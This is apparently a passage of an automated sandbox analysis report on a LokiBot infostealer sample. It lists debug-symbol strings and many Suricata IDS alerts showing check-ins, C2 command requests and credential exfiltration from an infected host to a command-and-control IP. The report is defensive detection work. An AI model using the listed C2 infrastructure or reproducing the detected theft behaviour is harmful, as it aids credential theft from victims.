                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb%t& source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Accessibility.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP*n0C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: System.Configuration.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdbAccessibility.dll source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Xml.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: System.Core.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: %%.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Roaming\IOsbBBIDAm.PDB. source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb!v9 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\dll\System.pdb1 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.ni.pdb source: WERA61F.tmp.dmp.16.dr
                Source: Binary string: mscorlib.pdb ) source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdbDDa source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,8_2_00403D74

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49774 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49767
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49750
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49774
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49855 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49824 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49886 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49855 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49855 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49737 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49855 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49855 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49902 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49886 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49771
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49752
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49902 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49902 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49841
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49886 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49902 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49886 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49902 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49920 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49773
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49855
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.41:80
